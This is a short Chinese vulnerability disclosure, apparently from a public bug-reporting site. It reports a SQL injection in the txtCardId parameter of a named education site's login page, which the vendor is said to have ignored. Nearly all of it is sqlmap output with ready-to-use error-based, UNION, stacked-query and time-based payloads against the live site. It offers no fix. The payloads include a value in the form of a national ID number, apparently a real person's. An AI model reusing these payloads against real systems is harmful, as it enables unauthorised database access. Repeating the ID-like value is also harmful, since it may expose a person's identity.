2014-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-06-12: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入
登录页:http://m.jxteacher.com/bm/xg_login.aspx,参数txtCardId可被注入
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:---Place: POSTParameter: txtCardId Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUJNzMzNzQ5NzA0ZGQPdOn0vUvidpfSTdNvMkm7njJmgQ==&__EVENTVALIDATION=/wEWBALkvYKzAQKTrarUCgKd+7qdDgKC3IeGDNJ7WqEZRArIgxqdRFxz4bZ4OjTe&txtCardId=360901198802079659') AND 8588=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(109)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (8588=8588) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(104)+CHAR(102)+CHAR(113))) AND ('keJO'='keJO&txtPwd=360901198802079659&btnLogin=%E7%99%BB%E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 70 columns Payload: __VIEWSTATE=/wEPDwUJNzMzNzQ5NzA0ZGQPdOn0vUvidpfSTdNvMkm7njJmgQ==&__EVENTVALIDATION=/wEWBALkvYKzAQKTrarUCgKd+7qdDgKC3IeGDNJ7WqEZRArIgxqdRFxz4bZ4OjTe&txtCardId=360901198802079659') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(109)+CHAR(110)+CHAR(113)+CHAR(107)+CHAR(82)+CHAR(79)+CHAR(65)+CHAR(72)+CHAR(115)+CHAR(76)+CHAR(117)+CHAR(73)+CHAR(82)+CHAR(113)+CHAR(120)+CHAR(104)+CHAR(102)+CHAR(113),NULL,NULL-- &txtPwd=360901198802079659&btnLogin=%E7%99%BB%E5%BD%95 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJNzMzNzQ5NzA0ZGQPdOn0vUvidpfSTdNvMkm7njJmgQ==&__EVENTVALIDATION=/wEWBALkvYKzAQKTrarUCgKd+7qdDgKC3IeGDNJ7WqEZRArIgxqdRFxz4bZ4OjTe&txtCardId=360901198802079659'); WAITFOR DELAY '0:0:5'--&txtPwd=360901198802079659&btnLogin=%E7%99%BB%E5%BD%95 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJNzMzNzQ5NzA0ZGQPdOn0vUvidpfSTdNvMkm7njJmgQ==&__EVENTVALIDATION=/wEWBALkvYKzAQKTrarUCgKd+7qdDgKC3IeGDNJ7WqEZRArIgxqdRFxz4bZ4OjTe&txtCardId=360901198802079659') WAITFOR DELAY '0:0:5'--&txtPwd=360901198802079659&btnLogin=%E7%99%BB%E5%BD%95---[10:11:58] [INFO] testing Microsoft SQL Server[10:11:58] [INFO] confirming Microsoft SQL Server[10:11:59] [INFO] the back-end DBMS is Microsoft SQL Server
你懂的
未能联系到厂商或者厂商积极拒绝